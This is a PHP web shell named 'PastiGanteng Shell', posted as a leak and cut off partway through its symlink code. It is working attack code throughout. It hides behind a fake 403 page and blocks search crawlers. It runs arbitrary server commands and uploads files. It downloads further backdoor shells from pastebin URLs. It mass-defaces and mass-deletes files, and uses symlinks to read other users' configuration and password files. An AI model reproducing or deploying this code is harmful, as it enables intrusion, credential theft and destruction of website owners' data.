· 7 years ago · Sep 27, 2018, 01:48 AM
1Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
2<?php
3
4$auth_pass = "dacffae94acdb77294f2033ce4f23ead"; // default : PastiGanteng
5
6session_start();
7error_reporting(0);
8set_time_limit(0);
9@set_magic_quotes_runtime(0);
10@clearstatcache();
11@ini_set('error_log',NULL);
12@ini_set('log_errors',0);
13@ini_set('max_execution_time',0);
14@ini_set('output_buffering',0);
15@ini_set('display_errors', 0);
16
17$color = "#00ff00";
18$default_action = 'FilesMan';
19$default_use_ajax = true;
20$default_charset = 'UTF-8';
21if(!empty($_SERVER['HTTP_USER_AGENT'])) {
22 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
23 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
24 header('HTTP/1.0 404 Not Found');
25 exit;
26 }
27}
28
29function login_shell() {
30?>
31<html>
32<head>
33<?php
34$forbid = ($_SERVER['PHP_SELF']);
35echo "<title>403 Forbidden</title>
36</head>
37<body><h1>Forbidden</h1>
38<p>You don't have permission to access ".$forbid." on this server.</p>";
39if($_GET['ganteng'] == 'login') {
40echo '
41<style>
42
43html {
44 margin: 20px auto;
45 background: #000000;
46 text-align: center;
47}
48
49h1,p {
50 display: none;
51}
52header {
53 margin: 10px auto;
54 color: lightblue;
55 font-family: Arial;
56}
57input[type=password],input[type=text] {
58 margin: 3px auto;
59 width: 250px;
60 height: 25px;
61 color: red;
62 background: #000000;
63 border: 1px solid #333;
64 padding: 5px;
65 text-align: center;
66 cursor: text;
67}
68
69input[type=submit] {
70 margin: 3px;
71 width: 50px;
72 height: 33px;
73 border: 1px solid #333;
74 cursor: pointer;
75 border-radius: 3px;
76 background: #000;
77 color: red;
78}
79
80
81a {
82 opacity: 0.6
83}
84
85a:hover {
86 opacity: 1;
87}
88
89</style>
90
91<header>
92<span style="font-size: 30px; font-weight: bold; font-style: italic;">PastiGanteng Shell</span>
93<br>
94<span style="font-size: 13px; font-weight: bold;">Final</span>
95<br>
96<br>
97<a href="https://www.facebook.com/SCyberArt/" target="_blank"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTguFp1dPZHmSCRUTouRQNJOPfIEg1ih9B02QPW5SzutriHDt4xhA" width="300px" height="300px"></a>
98</h2>
99</header>
100<br>
101
102<form method="post">
103<input type="text" value="Xmall75" title="Username" disabled>
104<br>
105<input type="password" name="pass" title="Password">
106<br>
107<input type="submit" value=">>">
108<br>
109</form>
110<br>
111<span style="color: #eee; size: 15px; font-family: Calibri; font-weight: bold;"> Hello </span><span style="font-family: Arial; font-style: italic; color: red; size: 15px;">'.$_SERVER['REMOTE_ADDR'].'</span>
112</center>';
113}
114?>
115<?php
116exit;
117}
118
119$forbid = ($_SERVER['PHP_SELF']);
120
121if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
122 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) )) {
123 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
124 echo '<script type="text/javascript"> window.location="'.$forbid.'" </script>';
125 }
126 else
127 login_shell();
128if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
129 @ob_clean();
130 $file = $_GET['file'];
131 header('Content-Description: File Transfer');
132 header('Content-Type: application/octet-stream');
133 header('Content-Disposition: attachment; filename="'.basename($file).'"');
134 header('Expires: 0');
135 header('Cache-Control: must-revalidate');
136 header('Pragma: public');
137 header('Content-Length: ' . filesize($file));
138 readfile($file);
139 exit;
140}
141?>
142<html>
143<head>
144<title><?php $judul = ($_SERVER['SERVER_NAME']); echo "".$judul.""; ?> - PastiGanteng Shell </title>
145<meta name='author' content='Xmall75'>
146<meta charset="UTF-8">
147<style type='text/css'>
148@import url(https://fonts.googleapis.com/css?family=Ubuntu);
149html {
150 background: #000000;
151 color: gold;
152 font-family: Arial;
153 font-size: 13px;
154 width: 100%;
155}
156
157div.header {
158 left: 0;
159 width: 37%;
160 height: 27%;
161 text-align: center;
162}
163
164div.header img {
165 float: left;
166 vertical-align: middle;
167 padding: 10px;
168 padding-right: 25px;
169 border-right: 2px solid #333;
170}
171
172div.header span#kepala {
173 color: #eee;
174 font-size: 30px;
175 font-weight: bold;
176 cursor: pointer;
177}
178
179div.header span#kepala:hover {
180 color: lightskyblue;
181}
182
183.menu span {
184 margin: 5px;
185 margin-bottom: 10px;
186}
187
188table, th, td {
189 border-collapse:collapse;
190 font-family: Tahoma, Geneva, sans-serif;
191 background: transparent;
192 font-family: 'Ubuntu';
193 font-size: 13px;
194}
195.table_home, .th_home, .td_home {
196 border: 1px solid #333;
197}
198
199.th_home {
200 background: #333;
201 color: lightblue;
202}
203
204.td_home a:hover {
205 color: lightskyblue;
206}
207
208.table_home tr:hover {
209 background: #333;
210 color: lightskyblue;
211}
212
213th {
214 padding: 10px;
215}
216
217.menu span a {
218 color: lightblue;
219 text-decoration: none;
220 background: #333;
221 margin: 5px auto;
222 padding: 5px;
223 border-radius: 4px;
224 opacity: 0.8;
225}
226
227.menu span a:hover {
228 opacity : 1;
229 text-decoration: none;
230}
231
232a {
233 color: #ff0000;
234 text-decoration: none;
235}
236a:hover {
237 text-decoration: underline;
238}
239
240input[type=text], input[type=password],input[type=submit],input[type=file] {
241 background: transparent;
242 color: #fff;
243 border: 1px solid #333;
244 margin: 5px auto;
245 padding-left: 5px;
246 font-family: 'Ubuntu';
247 font-size: 13px;
248}
249
250textarea {
251 border: 1px solid #333;
252 width: 100%;
253 height: 400px;
254 padding-left: 5px;
255 margin: 10px auto;
256 resize: none;
257 background: transparent;
258 color: #ffffff;
259 font-family: 'Ubuntu';
260 font-size: 13px;
261}
262
263select {
264 width: 152px;
265 background: #000000;
266 color: lime;
267 border: 1px solid #333;
268 margin: 5px auto;
269 padding-left: 5px;
270 font-family: 'Ubuntu';
271 font-size: 13px;
272 cursor: pointer;
273}
274
275option {
276 cursor: pointer;
277}
278
279option.lightblue {
280 color: lightblue;
281 cursor: pointer;
282}
283
284option.red {
285 color: red;
286 cursor: pointer;
287}
288
289</style>
290</head>
291<?php
292
293function w($dir,$perm) {
294 if(!is_writable($dir)) {
295 return "<font color=red>".$perm."</font>";
296 } else {
297 return "<font color=lime>".$perm."</font>";
298 }
299}
300function r($dir,$perm) {
301 if(!is_readable($dir)) {
302 return "<font color=red>".$perm."</font>";
303 } else {
304 return "<font color=lime>".$perm."</font>";
305 }
306}
307function exe($cmd) {
308 if(function_exists('system')) {
309 @ob_start();
310 @system($cmd);
311 $buff = @ob_get_contents();
312 @ob_end_clean();
313 return $buff;
314 } elseif(function_exists('exec')) {
315 @exec($cmd,$results);
316 $buff = "";
317 foreach($results as $result) {
318 $buff .= $result;
319 } return $buff;
320 } elseif(function_exists('passthru')) {
321 @ob_start();
322 @passthru($cmd);
323 $buff = @ob_get_contents();
324 @ob_end_clean();
325 return $buff;
326 } elseif(function_exists('shell_exec')) {
327 $buff = @shell_exec($cmd);
328 return $buff;
329 }
330}
331function perms($file){
332 $perms = fileperms($file);
333 if (($perms & 0xC000) == 0xC000) {
334 // Socket
335 $info = 's';
336 } elseif (($perms & 0xA000) == 0xA000) {
337 // Symbolic Link
338 $info = 'l';
339 } elseif (($perms & 0x8000) == 0x8000) {
340 // Regular
341 $info = '-';
342 } elseif (($perms & 0x6000) == 0x6000) {
343 // Block special
344 $info = 'b';
345 } elseif (($perms & 0x4000) == 0x4000) {
346 // Directory
347 $info = 'd';
348 } elseif (($perms & 0x2000) == 0x2000) {
349 // Character special
350 $info = 'c';
351 } elseif (($perms & 0x1000) == 0x1000) {
352 // FIFO pipe
353 $info = 'p';
354 } else {
355 // Unknown
356 $info = 'u';
357 }
358 // Owner
359 $info .= (($perms & 0x0100) ? 'r' : '-');
360 $info .= (($perms & 0x0080) ? 'w' : '-');
361 $info .= (($perms & 0x0040) ?
362 (($perms & 0x0800) ? 's' : 'x' ) :
363 (($perms & 0x0800) ? 'S' : '-'));
364 // Group
365 $info .= (($perms & 0x0020) ? 'r' : '-');
366 $info .= (($perms & 0x0010) ? 'w' : '-');
367 $info .= (($perms & 0x0008) ?
368 (($perms & 0x0400) ? 's' : 'x' ) :
369 (($perms & 0x0400) ? 'S' : '-'));
370 // World
371 $info .= (($perms & 0x0004) ? 'r' : '-');
372 $info .= (($perms & 0x0002) ? 'w' : '-');
373 $info .= (($perms & 0x0001) ?
374 (($perms & 0x0200) ? 't' : 'x' ) :
375 (($perms & 0x0200) ? 'T' : '-'));
376 return $info;
377}
378function hdd($s) {
379 if($s >= 1073741824)
380 return sprintf('%1.2f',$s / 1073741824 ).' GB';
381 elseif($s >= 1048576)
382 return sprintf('%1.2f',$s / 1048576 ) .' MB';
383 elseif($s >= 1024)
384 return sprintf('%1.2f',$s / 1024 ) .' KB';
385 else
386 return $s .' B';
387}
388function ambilKata($param, $kata1, $kata2){
389 if(strpos($param, $kata1) === FALSE) return FALSE;
390 if(strpos($param, $kata2) === FALSE) return FALSE;
391 $start = strpos($param, $kata1) + strlen($kata1);
392 $end = strpos($param, $kata2, $start);
393 $return = substr($param, $start, $end - $start);
394 return $return;
395}
396function getsource($url) {
397 $curl = curl_init($url);
398 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
399 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
400 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
401 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
402 $content = curl_exec($curl);
403 curl_close($curl);
404 return $content;
405}
406function bing($dork) {
407 $npage = 1;
408 $npages = 30000;
409 $allLinks = array();
410 $lll = array();
411 while($npage <= $npages) {
412 $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
413 if($x) {
414 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
415 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
416 $npage = $npage + 10;
417 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
418 } else break;
419 }
420 $URLs = array();
421 foreach($allLinks as $url){
422 $exp = explode("/", $url);
423 $URLs[] = $exp[2];
424 }
425 $array = array_filter($URLs);
426 $array = array_unique($array);
427 $sss = count(array_unique($array));
428 foreach($array as $domain) {
429 echo $domain."\n";
430 }
431}
432function reverse($url) {
433 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
434 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
435 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
436 curl_setopt($ch, CURLOPT_HEADER, 0);
437 curl_setopt($ch, CURLOPT_POST, 1);
438 $resp = curl_exec($ch);
439 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
440 $array = explode(",,", $resp);
441 unset($array[0]);
442 foreach($array as $lnk) {
443 $lnk = "http://$lnk";
444 $lnk = str_replace(",", "", $lnk);
445 echo $lnk."\n";
446 ob_flush();
447 flush();
448 }
449 curl_close($ch);
450}
451if(get_magic_quotes_gpc()) {
452 function idx_ss($array) {
453 return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
454 }
455 $_POST = idx_ss($_POST);
456 $_COOKIE = idx_ss($_COOKIE);
457}
458
459if(isset($_GET['dir'])) {
460 $dir = $_GET['dir'];
461 chdir($dir);
462} else {
463 $dir = getcwd();
464}
465$kernel = php_uname();
466$ip = gethostbyname($_SERVER['HTTP_HOST']);
467$dir = str_replace("\\","/",$dir);
468$scdir = explode("/", $dir);
469$freespace = hdd(disk_free_space("/"));
470$total = hdd(disk_total_space("/"));
471$used = $total - $freespace;
472$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
473$ds = @ini_get("disable_functions");
474$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
475$mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
476$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
477$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
478$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
479$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
480$bash = (exe('bash --version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
481$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
482
483
484function summonshell($names,$lokasi){
485 if ( $_GET['create'] == $names ){
486$a = "".$_SERVER['SERVER_NAME']."";
487$b = dirname($_SERVER['PHP_SELF']);
488$c = "/pastiganteng_tooler/".$names.".php";
489if (file_exists('pastiganteng_tooler/'.$names.'.php')){
490 echo '<script type="text/javascript">alert("File Exists > Click Ok to access");window.location.href = "pastiganteng_tooler/'.$names.'.php";</script> ';
491 }
492 else {mkdir("pastiganteng_tooler/", 0777);
493file_put_contents('pastiganteng_tooler/'.$names.'.php', file_get_contents($lokasi));
494echo ' <script type="text/javascript">alert("Done > Click Ok to access");window.location.href = "pastiganteng_tooler/'.$names.'.php";</script> ';}}}
495
496summonshell("ganteng1","http://pastebin.com/raw/BHcw07ZX");
497summonshell("45v17","http://pastebin.com/raw/vLT4QiSt");
498summonshell("wso251","http://pastebin.com/raw/BXmWGhMu");
499summonshell("wso28","http://pastebin.com/raw/BSj2SzEw");
500summonshell("wso30","http://pastebin.com/raw/M4NnspFA");
501summonshell("b374k","http://pastebin.com/raw/rZiyaRGV");
502summonshell("injection","http://pastebin.com/raw/nxxL8c1f");
503summonshell("blackhat","http://pastebin.com/raw/3L2ESWeu");
504summonshell("brudul","http://pastebin.com/raw/PQaeQF2Y");
505summonshell("mad2","http://pastebin.com/raw/1JeJttTn");
506summonshell("idx2","http://pastebin.com/raw/bQwmSeEG");
507summonshell("idx3","http://pastebin.com/raw/NuzRiZif");
508summonshell("noname","http://pastebin.com/raw/i201SrEy");
509
510
511if(!function_exists('posix_getegid')) {
512 $user = @get_current_user();
513 $uid = @getmyuid();
514 $gid = @getmygid();
515 $group = "?";
516} else {
517 $uid = @posix_getpwuid(posix_geteuid());
518 $gid = @posix_getgrgid(posix_getegid());
519 $user = $uid['name'];
520 $uid = $uid['uid'];
521 $group = $gid['name'];
522 $gid = $gid['gid'];
523}
524
525$software = getenv("SERVER_SOFTWARE");
526$serverport = $_SERVER["SERVER_PORT"];
527$adminserver=$_SERVER['SERVER_ADMIN'];
528
529echo "<br>";
530?>
531<div class='header'><img src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTguFp1dPZHmSCRUTouRQNJOPfIEg1ih9B02QPW5SzutriHDt4xhA' width='130px' height='130px'><br><br><br><br><span id='kepala' onclick="alert('PastiGanteng Shell - Xmall75');">PastiGanteng Shell</span>
532<?php
533echo "<br><span style='color: #eee; font-size: 12px; font-weight: bold;'> Final </span></div>";
534echo "<hr color='#333'>";
535echo "<br>";
536echo '<center><a href="https://www.facebook.com/SCyberArt/" target="_blank"><span style="font-weight: bold; font-size: 15px;"><font color="lime">Security Cyber Art</font></span></a><span style="color: #eee; font-size: 15px; font-weight: bold;"> - We Will Make Art On Your Security</span></center>';
537echo "<br>";
538echo "System: <font color=red>".$kernel."</font><br>";
539echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=red>".$_SERVER['REMOTE_ADDR']."</font> | Server Port: <font color=red>".$serverport."</font> | Admin: <font color=lime>".$adminserver."</font><br>";
540echo "Software: <font color=red>".$software."</font><br>";
541echo "User: <font color=red>".$user."</font> (".$uid.") Group: <font color=red>".$group."</font> (".$gid.")<br>";
542echo "HDD: <font color=red>$used</font> / <font color=red>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
543echo "PHP Version: <font color=red>".phpversion()."</font> on <font color=lime>".php_sapi_name()."</font><br>";
544echo "Disable Functions: ".$show_ds." on <font color=lime>".php_sapi_name()."</font><br>";
545echo "Safe Mode: $sm<br>";
546echo "MySQL: $mysql | MySQLi: $mysqli | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl | Bash: $bash <br>";
547echo "</center>";
548echo "<br>";
549echo "<form method='post'>
550 <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
551 <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
552 </form>";
553 if($_POST['do_cmd']) {
554 echo "<pre>".exe($_POST['cmd'])."</pre>";
555 }
556echo "<form method='post' enctype='multipart/form-data'>
557 <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
558 <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
559 <input type='file' name='ix_file'>
560 <input type='submit' value='upload' name='upload'>
561 </form>";
562if($_POST['upload']) {
563 if($_POST['tipe_upload'] == 'biasa') {
564 if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
565 echo "<font color=lime>Uploaded!</font> at <i><b><font color=lightskyblue>$dir/".$_FILES['ix_file']['name']."</font></b></i>";
566 } else {
567 echo "<font color=red>failed to upload file</font>";
568 }
569 } else {
570 $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
571 $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
572 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
573 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
574 echo "<font color=lime>Uploaded!</font> at <i><b><font color=lightskyblue>$root </font> => </b></i><a href='http://$web' target='_blank'>$web</a>";
575 } else {
576 echo "<font color=red>failed to upload file</font>";
577 }
578 } else {
579 echo "<font color=red>failed to upload file</font>";
580 }
581 }
582 }
583echo "<hr color='#333'>";
584echo "<center>";
585echo "<form method='get'>Jump Dir: <input type='text' style='width: 300px;' name='dir' value='".$dir."'><input type='submit' value='>>'></form>";
586echo "Current DIR: ";
587foreach($scdir as $c_dir => $cdir) {
588 echo "<a href='?dir=";
589 for($i = 0; $i <= $c_dir; $i++) {
590 echo $scdir[$i];
591 if($i != $c_dir) {
592 echo "/";
593 }
594 }
595 echo "'>$cdir</a>/";
596}
597echo " [ ".w($dir, perms($dir))." ]";
598echo "<div class='menu'>";
599echo "<br>";
600echo "<br>";
601echo "<span><a href='?dir=$dir&do=mass_deface'>Mass Deface</a></span>";
602echo "<span><a href='?dir=$dir&do=mass_delete'>Mass Delete</a></span>";
603echo "<span><a href='?dir=$dir&do=config'>Config</a></span>";
604echo "<span><a href='?dir=$dir&do=config2'>Config V.2</a></span>";
605echo "<span><a href='?dir=$dir&do=vhost'>Bypass Symlink vHost</a></span>";
606echo "<span><a href='?dir=$dir&do=jumping'>Jumping</a></span>";
607echo "<span><a href='?dir=$dir&do=cpanel'>CPanel Crack</a></span>";
608echo "<span><a href='?dir=$dir&do=domain'>Domains Viewer</a></span>";
609echo "<span><a href='?dir=$dir&do=server'>Server Info</a></span>";
610echo "<span><a href='?dir=$dir&do=hashid'>Hash Identify</a></span>";
611echo "<span><a style='color: red; font-weight: bold;' href='?'>Home</a></span>";
612echo "<br>";
613echo "<br>";
614echo "<span><a href='?dir=$dir&do=zip_menu'>Zip Menu</a></span>";
615echo "<span><a href='?dir=$dir&do=smtp'>SMTP Grabber</a></span>";
616echo "<span><a href='?dir=$dir&do=zoneh'>Zone-H</a></span>";
617echo "<span><a href='?dir=$dir&do=symlink'>Symlink Tools</a></span>";
618echo "<span><a href='?dir=$dir&do=cgi'>CGI Telnet</a></span>";
619echo "<span><a href='?dir=$dir&do=network'>network</a></span>";
620echo "<span><a href='?dir=$dir&do=adminer'>Adminer</a></span>";
621echo "<span><a href='?dir=$dir&do=fake_root'>Fake Root</a></span>";
622echo "<span><a href='?dir=$dir&do=hasher'>Password Hasher</a></span>";
623echo "<span><a href='?dir=$dir&do=cms_detect'>CMS Detector</a></span>";
624echo "<span><a href='?dir=$dir&do=whois'>Whois</a></span>";
625echo "<span><a href='?dir=$dir&do=shell_check'>Shell Checker</a></span>";
626echo "<span><a href='?dir=$dir&do=contact'>Contact</a></span>";
627echo "<span><a style='color: red; font-weight: bold;' href='?dir=$dir&do=kill'>Kill</a></span>";
628echo "<br>";
629echo "<br>";
630echo "<span><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></span>";
631echo "<span><a href='?dir=$dir&do=auto_wp'>Auto Edit Title WP</a></span>";
632echo "<span><a href='?dir=$dir&do=auto_dwp'>WP Auto Deface</a></span>";
633echo "<span><a href='?dir=$dir&do=auto_dwp2'>WP Auto Deface V.2</a></span>";
634echo "<span><a href='?dir=$dir&do=wp_hijack'>WP Hijack</a></span>";
635echo "<span><a href='?dir=$dir&do=wprespw'>WP Reset Password</a></span>";
636echo "<span><a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></span>";
637echo "<span><a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a></span>";
638echo "<span><a href='?dir=$dir&do=log_hunter'>Log Hunter</a></span>";
639echo "<span><a href='?dir=$dir&do=csrf'>CSRF Online</a></span>";
640echo "<span><a style='color: red; font-weight: bold;' href='?logout=true'>Logout</a></span>";
641echo "</center>";
642echo "</div>";
643echo "<br>";
644echo "<hr color='#333'>";
645if($_GET['logout'] == true) {
646 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
647 echo "<script>window.location='".$_SERVER['PHP_SELF']."';</script>";
648
649} elseif($_GET['do'] == 'kill') {
650 if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
651 die('<center><br><center><h2>Shell removed</h2><br>Goodbye, Thanks for take my shell today</center></center>');
652 else
653 echo '<center>unlink failed!</center>';
654
655} elseif($_GET['do'] == 'mass_deface') {
656 function sabun_massal($dir,$namafile,$isi_script) {
657 if(is_writable($dir)) {
658 $dira = scandir($dir);
659 foreach($dira as $dirb) {
660 $dirc = "$dir/$dirb";
661 $lokasi = $dirc.'/'.$namafile;
662 if($dirb === '.') {
663 file_put_contents($lokasi, $isi_script);
664 } elseif($dirb === '..') {
665 file_put_contents($lokasi, $isi_script);
666 } else {
667 if(is_dir($dirc)) {
668 if(is_writable($dirc)) {
669 echo "[<font color=lime>DONE</font>] $lokasi<br>";
670 file_put_contents($lokasi, $isi_script);
671 $idx = sabun_massal($dirc,$namafile,$isi_script);
672 }
673 }
674 }
675 }
676 }
677 }
678 function sabun_biasa($dir,$namafile,$isi_script) {
679 if(is_writable($dir)) {
680 $dira = scandir($dir);
681 foreach($dira as $dirb) {
682 $dirc = "$dir/$dirb";
683 $lokasi = $dirc.'/'.$namafile;
684 if($dirb === '.') {
685 file_put_contents($lokasi, $isi_script);
686 } elseif($dirb === '..') {
687 file_put_contents($lokasi, $isi_script);
688 } else {
689 if(is_dir($dirc)) {
690 if(is_writable($dirc)) {
691 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
692 file_put_contents($lokasi, $isi_script);
693 }
694 }
695 }
696 }
697 }
698 }
699 if($_POST['start']) {
700 if($_POST['tipe_sabun'] == 'mahal') {
701 echo "<div style='margin: 5px auto; padding: 5px'>";
702 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
703 echo "</div>";
704 } elseif($_POST['tipe_sabun'] == 'murah') {
705 echo "<div style='margin: 5px auto; padding: 5px'>";
706 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
707 echo "</div>";
708 }
709 } else {
710 echo "<center>";
711 echo "<form method='post'>
712 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
713 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
714 <font style='text-decoration: underline;'>Folder:</font><br>
715 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
716 <font style='text-decoration: underline;'>Filename:</font><br>
717 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
718 <font style='text-decoration: underline;'>Index File:</font><br>
719 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Xmall75 - Security Cyber Art</textarea><br>
720 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
721 </form></center>";
722 }
723} elseif($_GET['do'] == 'mass_delete') {
724 function hapus_massal($dir,$namafile) {
725 if(is_writable($dir)) {
726 $dira = scandir($dir);
727 foreach($dira as $dirb) {
728 $dirc = "$dir/$dirb";
729 $lokasi = $dirc.'/'.$namafile;
730 if($dirb === '.') {
731 if(file_exists("$dir/$namafile")) {
732 unlink("$dir/$namafile");
733 }
734 } elseif($dirb === '..') {
735 if(file_exists("".dirname($dir)."/$namafile")) {
736 unlink("".dirname($dir)."/$namafile");
737 }
738 } else {
739 if(is_dir($dirc)) {
740 if(is_writable($dirc)) {
741 if(file_exists($lokasi)) {
742 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
743 unlink($lokasi);
744 $idx = hapus_massal($dirc,$namafile);
745 }
746 }
747 }
748 }
749 }
750 }
751 }
752 if($_POST['start']) {
753 echo "<div style='margin: 5px auto; padding: 5px'>";
754 hapus_massal($_POST['d_dir'], $_POST['d_file']);
755 echo "</div>";
756 } else {
757 echo "<center>";
758 echo "<form method='post'>
759 <font style='text-decoration: underline;'>Folder:</font><br>
760 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
761 <font style='text-decoration: underline;'>Filename:</font><br>
762 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
763 <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
764 </form></center>";
765 }
766
767} elseif($_GET['do'] == 'symlink') {
768
769 echo "<center><br><b><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=symlink1'> Symlink Server </a><br><br><br><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=symlink2'> Symlink Server 2 </a><br><br><br><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=sym404'> Bypass Symlink 404 </a></b></center><br><br><br>";
770
771
772} elseif($_GET['do'] == 'sym404') {
773
774 echo "<form method='post'><br>File Target : <br><input type='text' name='dir' value='/home/user/public_html/wp-config.php'>
775<br>Save As: <br><input type='text' name='jnck' value='ojayakan.txt'><input name='ojaykan' type='submit' value='>>'></form><br>";
776
777@ini_set('display_errors', 0);
778if($_POST['ojaykan']){
779rmdir("pastigans_sym404");mkdir("pastigans_sym404", 0777);
780$dir = $_POST['dir'];
781$jnck = $_POST['jnck'];
782system("ln -s ".$dir." pastigans_sym404/".$jnck);
783symlink($dir,"pastigans_sym404/".$jnck);
784$inija = fopen("pastigans_sym404/.htaccess", "w");
785fwrite($inija,"ReadmeName ".$jnck."
786Options Indexes FollowSymLinks
787DirectoryIndex ngeue.htm
788AddType text/plain .php
789AddHandler text/plain .php
790Satisfy Any
791");
792echo'<a href="pastigans_sym404/">Klik Gan >:(</a>';
793}
794
795
796} elseif($_GET['do'] == 'symlink1') {
797
798 $d0mains = @file("/etc/named.conf");
799##httaces
800if($d0mains){
801@mkdir("pastiganteng_sym1",0777);
802@chdir("pastiganteng_sym1");
803@exe("ln -s / root");
804$file3 = 'Options all
805DirectoryIndex Sux.html
806AddType text/plain .php
807AddHandler server-parsed .php
808AddType text/plain .html
809AddHandler txt .html
810Require None
811Satisfy Any';
812$fp3 = fopen('.htaccess','w');
813$fw3 = fwrite($fp3,$file3);@fclose($fp3);
814echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
815<table align=center border=1 style='width:60%;border-color:#333333;'>
816<tr>
817<td align=center><font size=3>S. No.</font></td>
818<td align=center><font size=3>Domains</font></td>
819<td align=center><font size=3>Users</font></td>
820<td align=center><font size=3>Symlink</font></td>
821</tr>";
822$dcount = 1;
823foreach($d0mains as $d0main){
824if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
825flush();
826if(strlen(trim($domains[1][0])) > 2){
827$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
828echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
829<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
830<td>".$user['name']."</td>
831<td><a href='/pastiganteng_sym1/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
832flush();
833$dcount++;}}}
834echo "</table>";
835}else{
836$TEST=@file('/etc/passwd');
837if ($TEST){
838@mkdir("pastiganteng_sym1",0777);
839@chdir("pastiganteng_sym1");
840exe("ln -s / root");
841$file3 = 'Options all
842 DirectoryIndex Sux.html
843 AddType text/plain .php
844 AddHandler server-parsed .php
845 AddType text/plain .html
846 AddHandler txt .html
847 Require None
848 Satisfy Any';
849 $fp3 = fopen('.htaccess','w');
850 $fw3 = fwrite($fp3,$file3);
851 @fclose($fp3);
852 echo "<br><br><center><h2>-=Symlink Server=-</h2></center><br><br>
853 <table align=center border=1><tr>
854 <td align=center><font size=4>S. No.</font></td>
855 <td align=center><font size=4>Users</font></td>
856 <td align=center><font size=4>Symlink</font></td></tr>";
857 $dcount = 1;
